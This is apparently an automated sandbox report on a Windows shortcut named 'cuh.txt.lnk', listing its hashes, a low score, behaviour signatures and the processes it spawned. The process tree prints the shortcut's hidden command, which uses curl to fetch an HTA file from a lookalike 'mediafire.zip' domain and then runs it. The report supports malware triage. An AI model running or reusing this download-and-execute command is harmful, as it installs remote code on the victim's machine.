Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
08-06-2024 21:46
Static task
static1
Behavioral task
behavioral1
Sample
cuh.txt.lnk
Resource
win7-20240220-en
2 signatures
150 seconds
General
-
Target
cuh.txt.lnk
-
Size
1KB
-
MD5
3947296e1f311ad2bd25bb986e9d4622
-
SHA1
57c1f9b221a150919dc23ce6f10ed5b8f74fbd12
-
SHA256
6f8196f6de261c3b0d45e9b847ae3cf706d99732778a7f86b954ea23e3dd342b
-
SHA512
24f5432807bbb1f867765738ddd3c391882a4fd49f19c9d34339f995de3bd07db8ec8ae0df7283e7e670d93c599b89c87ff64f0208a10d52412ab6407715fde1
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2176 wrote to memory of 2656 2176 cmd.exe cmd.exe PID 2176 wrote to memory of 2656 2176 cmd.exe cmd.exe PID 2176 wrote to memory of 2656 2176 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\cuh.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta" && "C:\Users\Admin\AppData\Local\Temp\build.hta"2⤵